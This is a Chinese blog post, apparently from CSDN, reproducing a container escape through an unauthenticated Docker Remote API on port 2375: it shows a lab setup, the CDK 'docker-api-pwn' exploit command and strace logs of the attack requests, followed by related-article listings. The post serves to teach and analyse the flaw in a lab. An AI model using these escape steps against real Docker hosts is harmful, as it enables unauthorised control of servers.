Docker Remote API 逃逸攻击(2375端口)

已于 2024-01-23 17:47:16 修改
阅读量597 收藏 10
点赞数 9
分类专栏: 容器安全 文章标签: docker 容器 网络安全 安全 云计算
于 2024-01-19 11:44:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31610083/article/details/135693881
版权

Docker Remote API 逃逸攻击(2375端口)

一、漏洞简介

Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸。

二、前置知识

Docker 远程管理端口

为了实现集群管理,Docker提供了远程管理接口。Docker Daemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为错误地使用了Docker远端接口,引起了安全漏洞,因此在启动Docker Daemon时,加入-H 0.0.0.0:2375,Docker Daemon就可以接收远端的Docker Client发送的指令。Docker是把2375端口作为非加密端口暴露出来,一般是用在测试环境中。此时,没有任何加密和认证过程,只要知道Docker主机的IP,任何人都可以管理这台主机上的容器和镜像。

三、漏洞利用路径

  1. 检查2375端口:向宿主机2375端口发送HTTP GET请求/info
  2. 准备恶意容器镜像:向宿主机2375端口发送HTTP POST请求/images/create
  3. 实施攻击:向宿主机2375端口发送HTTP POST请求,分别用/containers/create和/containers//start创建并启动恶意活动容器,其中容器配置通过JSON在create构造

四、漏洞复现

环境搭建

  • ubuntu 20.04
  • docker 23.0.2

打开docker远程访问API:

  1. 打开/usr/lib/systemd/system/docker.service文件,在[service]ExeStart=...后面追加:
-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

即:ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

  1. 重启生效
systemctl daemon-reload # 重新加载配置文件
systemctl restart docker

运行攻击容器:

docker run --rm -it --name=docker-api-pwn -v /root/cdk:/cdk ubuntu:20.04 bash

利用:

# in container
./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"	#ip地址改为宿主机地址或在创建容器时使用host网络
ls /tmp/docker-api-pwn

效果:宿主机上出现/tmp/docker-api-pwn文件,完成远程任意命令执行,逃逸成功。

五、漏洞行为数据分析

  1. 检查Docker Remote API是否开启。

    264   01:39:19.448323 rt_sigreturn({mask=[]}) = 3 <0.000016>
264   01:39:19.448394 socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 3 <0.000020>
264   01:39:19.448443 connect(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr("172.31.102.241")}, 16) = -1 EINPROGRESS (Operation now in progress) <0.000269>
264   01:39:19.448791 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=293859544, u64=140458609340632}}) = 0 <0.000010>
264   01:39:19.448845 epoll_pwait(4, [{EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, 0, NULL, 0) = 1 <0.000017>
264   01:39:19.448922 getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0 <0.000009>
264   01:39:19.448962 getpeername(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr("172.31.102.241")}, [112->16]) = 0 <0.000009>
264   01:39:19.449007 getsockname(3, {sa_family=AF_INET, sin_port=htons(40088), sin_addr=inet_addr("172.17.0.4")}, [112->16]) = 0 <0.000009>
264   01:39:19.449049 setsockopt(3, SOL_TCP, TCP_NODELAY, [1], 4) = 0 <0.000009>
264   01:39:19.449085 setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 <0.000009>
264   01:39:19.449120 setsockopt(3, SOL_TCP, TCP_KEEPINTVL, [30], 4) = 0 <0.000009>
264   01:39:19.449156 setsockopt(3, SOL_TCP, TCP_KEEPIDLE, [30], 4) = 0 <0.000009>
264   01:39:19.449263 read(3, 0xc0001a8000, 4096) = -1 EAGAIN (Resource temporarily unavailable) <0.000010>
264   01:39:19.449352 write(3, "GET /info HTTP/1.1\r\nHost: 172.31"..., 136) = 136 <0.004713>
264   01:39:19.454111 epoll_pwait(4, [], 128, 0, NULL, 0) = 0 <0.000009>
264   01:39:19.454152 epoll_pwait(4,  <unfinished ...>
265   01:39:19.458155 <... nanosleep resumed>NULL) = 0 <0.010050>
265   01:39:19.458187 futex(0xe91c20, FUTEX_WAIT_PRIVATE, 0, {tv_sec=60, tv_nsec=0} <unfinished ...>
264   01:39:19.471125 <... epoll_pwait resumed>[{EPOLLIN|EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, -1, NULL, 0) = 1 <0.016960>
264   01:39:19.471182 futex(0xe91c20, FUTEX_WAKE_PRIVATE, 1) = 1 <0.000012>
265   01:39:19.471213 <... futex resumed>) = 0 <0.013009>
265   01:39:19.471229 sched_yield()     = 0 <0.000010>
265   01:39:19.471261 futex(0xe91b38, FUTEX_WAIT_PRIVATE, 2, NULL <unfinished ...>
264   01:39:19.471284 futex(0xe91b38, FUTEX_WAKE_PRIVATE, 1) = 1 <0.000011>
265   01:39:19.471311 <... futex resumed>) = 0 <0.000040>
265   01:39:19.471326 futex(0xe91b38, FUTEX_WAKE_PRIVATE, 1) = 0 <0.000019>
265   01:39:19.471367 epoll_pwait(4, [], 128, 0, NULL, 0) = 0 <0.000007>
265   01:39:19.471398 nanosleep({tv_sec=0, tv_nsec=20000},  <unfinished ...>
264   01:39:19.471426 read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1."..., 4096) = 2793 <0.000014>

  2. 向Docker Remote API发送构造好的恶意HTTP数据包,创建一个带不安全挂载的恶意容器。*

    264   01:39:26.915419 write(3, "POST /containers/create HTTP/1.1"..., 522 <unfinished ...>
265   01:39:26.915457 <... nanosleep resumed>NULL) = 0 <0.000183>
264   01:39:26.915475 <... write resumed>) = 522 <0.000041>

  3. 启动恶意容器,执行指定命令,实现逃逸。

    264   01:39:27.331880 write(3, "POST /containers/4da26d930eeb36b"..., 233 <unfinished ...>
265   01:39:27.331909 <... nanosleep resumed>NULL) = 0 <0.000164>
264   01:39:27.331928 <... write resumed>) = 233 <0.000033>

六、总结

本文分析了如何通过 Docker 远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。

七、参考链接

  1. Exploit: docker api pwn · cdk-team/CDK Wiki (github.com)
  2. vulhub/docker/unauthorized-rce at master · vulhub/vulhub (github.com)
  3. Docker开启远程安全访问
根本不是咖啡猫
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令
2401_83974660的博客
04-11 320
Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
docker开放2375端口,并添加安全传输层协议(TLS)和CA认证
热门推荐
honvin的博客
08-17 1万+
为了更便捷地打包和部署,服务器需要开放2375端口才能连接docker,但如果开放了端口没有做任何安全保护,会引起安全漏洞,被人入侵、挖矿、CPU飙升这些情况都有发生,任何知道你IP的人,都可以管理这台主机上的容器和镜像,真的可怕。 为了解决安全问题,只要使用安全传输层协议(TLS)进行传输并使用CA认证即可。 制作证书及秘钥 我们需要使用OpenSSL制作CA机构证书、服务端证书和客户端证书,以下操作均在安装Docker的Linux服务器上进行。 创建一个目录用于存储生成的证书和秘钥 mkdir
安全攻防(八)之 Docker Remote API 未授权访问逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-09 1758
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致未授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可导致敏感信息泄露,甚至可进一步利用Docker自身特性,借助容器逃逸,最终完全控制宿主服务器Docker daemon 是 Docker 引擎的后台进程,也称为 Dockerd。
关于docker remote api未授权访问漏洞的学习与研究
07-16 612
漏洞介绍: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(3)
2401_84544780的博客
05-16 363
Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(1)
2401_84544780的博客
05-16 371
Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(2)
2401_84544780的博客
05-16 264
Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(4)
2401_84544780的博客
05-16 214
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Docker未授权API逃逸
qq_69775412的博客
04-19 2197
一、Docker未授权介绍: dockerswarm: docker swarm是一个将docker集群变成单一虚拟的dockerhost工具,使用标准的DockerAPI,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍:https://docs.docker.com/engine/swarm/ 漏洞起因: 在使用dockerswarm的时候,发现管理的docker节点上会开放一个tcp端口2375,并且绑定在0.0.0.0上,http访问会返回404p...
Docker暴露2375端口导致服务器被攻击问题及解决方法
01-20
相信了解过docker remote API的同学对2375端口都不陌生了,2375docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。 当$HOST主机以docker daemon -H=0.0.0.0:2375方式启动daemon时,...
Docker暴露2375端口,引起安全漏洞
02-26
今天有小伙伴发现docker暴露出2375端口,引起了安全漏洞。我现在给大家介绍整个事情的来龙去脉,并告诉小伙伴们,怎么修复这个漏洞。为了实现集群管理,Docker提供了远程管理接口。DockerDaemon作为守护进程,运行在...
DockerDocker Remote API 访问控制
01-09
Docker Remote API 访问控制 Docker的远程调用 API 接口存在未授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd...
docker镜像反推Dockerfile
Merlin's Engineering Blog
05-27 326
在项目运维的过程中,偶尔会遇到某个docker image打包时候的Dockerfile版本管理不善无法与image对应的问题,抑或需要分析某个三方docker image的构建过程,这时,就希望能够通过image反推构建时的instruction.想实现这个过程可以使用一些三方工具比如dive,但是需要额外的安装,其实docker本身也有可用的功能,能帮助我们分析image的构建命令.
Docker搭建Redis主从 + Redis哨兵模式(一主一从俩哨兵)
weixin_42599091的博客
05-29 762
v /opt/docker/redis/conf/redis.conf:/etc/redis/redis.conf ## 容器里的redis配置文件与/opt/docker/redis/conf/redis.conf下的配置文件互相通信。-v /opt/docker/redis/data:/data ## 将容器里的数据挂载到宿主机/opt/docker/redis/data目录下。进入到 cd /opt/docker/redis/conf 把 redis.conf 配置文件放到这里。
使用dockerfile快速构建一个带ssh的docker镜像
qq_42693842的博客
05-29 150
镜像启动后没有自动启动ssh。需要手动进入镜像启动。
Docker基础命令(三)
最新发布
junjunzai123的博客
05-29 228
背景: 在很多时候, 训练模型的时候, 记录的log日志中标记的时间和实际的时间不一致, 往往是容器时间和本地时间不一致照成的.
Docker基础篇之常用命令
qq_43456605的博客
05-27 934
启动docker: 停止docker: 重启docker: 查看docker 的运行状态: 开机启动: 查看docker该要信息: 查看docker 帮助文档 查看docker命令帮助文档: 同一个仓库源可以有多个Tag版本,代表这个仓库源的不同个版本,我们使用Repository:Tag来定义不同的镜像。 它的options选项说明如下: docker search [options]:远程库中查找某个镜像的名称 它的options选项说明如下: docker pull 某个xxx镜像名字:将
java操作dockerapi查看映射端口
04-05
可以使用Java的Docker API来查看Docker容器的映射端口。以下是一个简单的Java示例代码: ```java import com.github.dockerjava.api.DockerClient; import com.github.dockerjava.api.command.InspectContainerResponse; import com.github.dockerjava.api.model.Container; import java.util.List; import java.util.Map; public class DockerPortMappingExample { public static void main(String[] args) { DockerClient dockerClient = DockerClientFactory.createDefault(); List<Container> containers = dockerClient.listContainersCmd().exec(); for (Container container : containers) { InspectContainerResponse inspectContainerResponse = dockerClient.inspectContainerCmd(container.getId()).exec(); Map<String, List<Map<String, String>>> portBindings = inspectContainerResponse.getHostConfig().getPortBindings(); if (portBindings != null) { for (Map.Entry<String, List<Map<String, String>>> entry : portBindings.entrySet()) { String containerPort = entry.getKey(); List<Map<String, String>> hostPorts = entry.getValue(); for (Map<String, String> hostPort : hostPorts) { String hostIp = hostPort.get("HostIp"); String hostPortNumber = hostPort.get("HostPort"); System.out.println("Container " + container.getId() + " port " + containerPort + " is mapped to " + hostIp + ":" + hostPortNumber); } } } } dockerClient.close(); } } ``` 该代码遍历所有Docker容器,并使用`inspectContainerCmd`方法检查每个容器的详细信息。然后,它获取容器端口映射绑定,遍历它们并打印出每个容器端口映射到的主机IP和端口号。 请注意,要运行此代码,您需要添加以下依赖项到您的Maven项目: ```xml <dependency> <groupId>com.github.docker-java</groupId> <artifactId>docker-java-core</artifactId> <version>3.2.5</version> </dependency> <dependency> <groupId>com.github.docker-java</groupId> <artifactId>docker-java-api</artifactId> <version>3.2.5</version> </dependency> ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值